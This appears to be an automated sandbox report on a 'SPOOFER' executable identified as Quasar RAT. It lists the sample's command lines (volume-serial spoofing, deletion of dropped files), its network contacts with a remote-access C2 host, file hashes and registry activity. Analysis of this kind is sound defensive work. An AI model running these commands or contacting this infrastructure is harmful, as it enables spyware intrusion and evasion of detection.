"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H

Network

Country Destination Domain Proto
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 104.20.67.143:443 pastebin.com tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 gaming7core.info udp
RU 45.15.156.156:80 gaming7core.info tcp
RU 45.15.156.156:80 gaming7core.info tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp

Files

memory/1428-0-0x0000000074950000-0x0000000074EFB000-memory.dmp

memory/1428-2-0x00000000020D0000-0x0000000002110000-memory.dmp

memory/1428-1-0x0000000074950000-0x0000000074EFB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 dd3e0eec26c9e936db64082d4d10d630
SHA1 a8eedd3e25644559db18b701edfb2370cfbaf52c
SHA256 1b3a1bc69df6d980c9c1e7b76429228dad8055262b35b244fde908a7c40b4127
SHA512 1bfc930f23f121dfd555fbbaf82e5f627306be8e97ec728deb4e42842f654d327818e76950b5070029128a6994f29e2d3133e1e4cef814dfdea95bfe4f09445f

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 8197930458a6153c34a1b03e4bcb5375
SHA1 59c211de4e3c7bd592acf9223fe2bdd8b5dbee12
SHA256 771368641b8fd02433767c4e755f40b48f53fb3c89e4c904d427221b82859d25
SHA512 1a25b723cc8edbbb4edddb3b5ff21dfab0d1226f8d225b9417a27d6a67322184092913c9d16a76e91d48fada13e6a345919014d66ca19a745a511f7bca688b3b

\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 a68e092df53d94b14a2e69e6eb374f76
SHA1 199ad2f87b32c28bbf1b2b0cc448e8df7717e38a
SHA256 7273c865aafc7c2ee2cf55287a4f998da8e754380f57bb585a7d615016c7437c
SHA512 099eaf461169f56712482d520b6be2b9644fb1e6b5e2866f22af5c3da5771828d30e10bab4cf1a4136e0256640473dbdaf9e19445504f11e7be216446c01863e

memory/2400-9-0x0000000000FB0000-0x00000000012D4000-memory.dmp

memory/2400-18-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2740-20-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2424-37-0x0000000000BA0000-0x0000000000C8A000-memory.dmp

memory/2728-55-0x00000000028F0000-0x0000000002930000-memory.dmp

memory/2728-57-0x0000000074020000-0x00000000745CB000-memory.dmp

memory/2728-58-0x00000000028F0000-0x0000000002930000-memory.dmp

memory/2424-67-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2728-66-0x00000000028F0000-0x0000000002930000-memory.dmp

memory/2728-68-0x0000000074020000-0x00000000745CB000-memory.dmp

memory/2740-64-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2424-54-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 cafbd27af223f6f85c3b0697e719dacd
SHA1 95a1e81a2602b422e419577e00b6ad548d1cbfa9
SHA256 8711716333b3f16cb0358db530b55b174c8042e1a2dbedf89d7eacb072e242e9
SHA512 d2dbb9f6f3e9bed249eee6d0d990d71689c525551011f4286a0682d98114571e6b2e495be87589e86ef580f7a4131af8864cfabd3ae28f8715673c2823474304

\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 77d0ad29a3bd8dbf604f101c9cddf8d4
SHA1 86583cb1caf29864cff7f115e405c464fe18647f
SHA256 35c967b02ac8e966a5a6a8b5267be478d53f406a1862ca4dc4c99f4151b596ee
SHA512 e22973df55dccdcd18aba65735a89b8b0fd1f58d78fa30c01b0e547b8af2d00395ab4c56a975da55a0d28e1c6602a06892fcc7ba87569a5a0751e56c9eb19fe1

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 cb63ac7833db68a31f0279f762644488
SHA1 182a9ab8fada225c3095556c085e22aa350df98f
SHA256 06697e8f8792f58c95e6e0a7e90d8f4bebfefe7534128942235008ebca1ac51b
SHA512 86d5154104c83d9c2339faeee73276d29e2c7ef0f8d939ae812eecd73b8721cb4ca90ab5c5f3f7837f7114a1a0395bf078deeddefe29a87322f616773ee67f39

memory/2912-75-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2912-74-0x0000000000300000-0x0000000000624000-memory.dmp

memory/2424-85-0x0000000000190000-0x000000000019E000-memory.dmp

memory/2424-87-0x00000000773C0000-0x00000000773C1000-memory.dmp

memory/2728-91-0x0000000074020000-0x00000000745CB000-memory.dmp

memory/2424-95-0x00000000003F0000-0x00000000003FE000-memory.dmp

memory/2424-93-0x00000000003E0000-0x00000000003EC000-memory.dmp

memory/2424-99-0x0000000077370000-0x0000000077371000-memory.dmp

memory/2424-100-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-98-0x0000000000410000-0x000000000041C000-memory.dmp

memory/2424-101-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-96-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2424-102-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-103-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-105-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2912-106-0x000000001B1E0000-0x000000001B260000-memory.dmp

memory/2424-107-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-108-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2912-104-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2424-109-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-90-0x00000000003D0000-0x00000000003DE000-memory.dmp

memory/2424-88-0x00000000773B0000-0x00000000773B1000-memory.dmp

memory/2424-86-0x00000000773D0000-0x00000000773D1000-memory.dmp

memory/2424-83-0x00000000001B0000-0x00000000001C8000-memory.dmp

memory/1780-140-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2424-134-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/1780-154-0x0000000002E40000-0x0000000002EC0000-memory.dmp

memory/1780-156-0x0000000002E40000-0x0000000002EC0000-memory.dmp

memory/1844-158-0x0000000002E80000-0x0000000002F00000-memory.dmp

memory/1656-162-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1656-166-0x0000000002844000-0x0000000002847000-memory.dmp

memory/1844-167-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1656-165-0x0000000002840000-0x00000000028C0000-memory.dmp

memory/992-164-0x0000000002DFB000-0x0000000002E62000-memory.dmp

memory/1780-163-0x0000000002E44000-0x0000000002E47000-memory.dmp

memory/1656-161-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1844-160-0x0000000002E80000-0x0000000002F00000-memory.dmp

memory/1844-159-0x0000000002E80000-0x0000000002F00000-memory.dmp

memory/1844-157-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1780-155-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1780-153-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1780-152-0x00000000004B0000-0x00000000004B8000-memory.dmp

memory/2424-81-0x00000000773E0000-0x00000000773E1000-memory.dmp

memory/2424-80-0x0000000000170000-0x000000000018C000-memory.dmp

memory/2424-78-0x0000000000140000-0x000000000014E000-memory.dmp

memory/2912-76-0x000000001B1E0000-0x000000001B260000-memory.dmp

memory/2400-73-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 df27546a0553738685e64842cbe488b3
SHA1 2959ef89fdce215a4dc1ab58f636734b72266ebb
SHA256 bc4d1bab345f2fb5f779c6f9ac8e48bbc98453e9256d48bd65ea3b91d2893f61
SHA512 e10beef1284952b5c3b5c232acc5c0d7ccaf9f011325731f2efad19d210489d00ef959e0e3c401f7701332d9c96d94397593ab88d4719edb73d8aafbff9a5d70

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 c4c48a3b867e307f9f5e1d1e329ae885
SHA1 f77131b77313dfe5e98eda0868fab4149ad02c7b
SHA256 00a561a5245fe91fd2d51f6304e430165e73bff4590757f54d6e283044f5162f
SHA512 5a86923bbf017739dddecd8acd5ee3c350dd8a28c66b6cfa8013a97b5942a12eedaa67bc663c8bcedbf7cb3946936c8f9c3ed84a94bff9cfebb0faf99c413f25

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 4b1723d1ea5cbb7ee2e2aecbcaac82d1
SHA1 a28a3de71a40871bf865219720dbc329ff72a131
SHA256 567c26b6ba6410d278b1db4bbbed7e041050c7236b4c58f06a93fcc1354f0a0f
SHA512 3de1fc799756c8f9d96d2f17073ccda646b213abb48011cff79775d9071b5ebade20a6850ca9a36b1f6311697213f03556027ab94a9ad4929f62c041bdd2301a

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 305412bd89f0ba963d98efc8e066e9ca
SHA1 12adae50dc2366b8df7706553d86da698702c118
SHA256 c8c74050d36463a4ca13db903cde8e2405dca6df01e380f26ea08f1643c886a8
SHA512 acc0881f5e88231317477becbd07b4bd37bfabbc0819e6b2d0afde1a5c0b32348675fc4b89b57fd0b3a41459383dea76e21fc6c99b57e5961e203df29108b303

\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 79337964db81ce4114b63d41ffb36aa9
SHA1 be2adbff05b94d71e77f5afbf9dc88db287d9d02
SHA256 adb779423182df8da466c195d7162f9a2da10dbe0eb3221d82ab0a1d114a3abb
SHA512 13831d3e1bf8d92455cdd2e51d6397dbef1b83b6cb789f2eba7011671287c4449ca4337b6b3ed9576129b90f7c3c670eea7cbf4c4147f1ebe14a6d0f0b33584f

\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 dd1313842898ffaf72d79df643637ded
SHA1 93a34cb05fdf76869769af09a22711deea44ed28
SHA256 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512 db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

memory/2400-21-0x000000001AFA0000-0x000000001B020000-memory.dmp

memory/2740-19-0x0000000000400000-0x0000000001274000-memory.dmp

memory/1428-16-0x0000000074950000-0x0000000074EFB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 41108a3d0f4912dd44a4028e2b1f99cb
SHA1 663019303ee07b73f8185fe8a9e5fc4d977a0485
SHA256 7764f6f5cb802de31b9164cc171fca00bd1f4d0195e1e888b540f0c04285a6c2
SHA512 39283ce81991ff932f4262bc8ad99f49242225def31168acd1f88679c8454bea3906d0e68c8a57678ceef40de47c61b485f4d44d3ba7ca490518e2a6a748e95e

\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 51c7515b35778ed49a89f2a5bdad46e2
SHA1 9f11f219eb26375fb2744ef885ddae2a520c9fc5
SHA256 e8f421e653c120ee10c60b54b9a2e09f9063750b0f388a8ffcbbda245bc6ebab
SHA512 4e174fb4b8b3560280f6f05229900b46058080820ea15e70e21c478b5341a0086898a5a530a3976faa1d991a0cbbc89fb835628c01fd933a435cb5ca3316fcc5

memory/1792-285-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-283-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-282-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-281-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-280-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-279-0x0000000140000000-0x000000014000E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab9E44.tmp

MD5 84a4974c2d22f28abf6e058f8485b9f9
SHA1 397635c06953c1b55290922481c9af07a95a45ab
SHA256 baa03ff90c1c45a132de3de72c8352e1b5eee5bf17bd47f2b42dc460d7225d05
SHA512 6545b960ee236c9ff8378052a673b90a38e596eb5a954900022b2b2d6a36593f927b3662135e480069fd5646eab23849bcd035bdd7882ee3e85cacc1be2416df

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-28 18:55

Reported

2023-12-28 18:58

Platform

win10v2004-20231215-en

Max time kernel

46s

Max time network

189s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\System32\Conhost.exe N/A
File opened (read-only) \??\F: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\wusa.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\Conhost.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\conhost.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\wusa.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\conhost.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\powercfg.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\F: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\powercfg.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\wusa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\cmd.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\wusa.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\wusa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\wusa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\powercfg.exe N/A
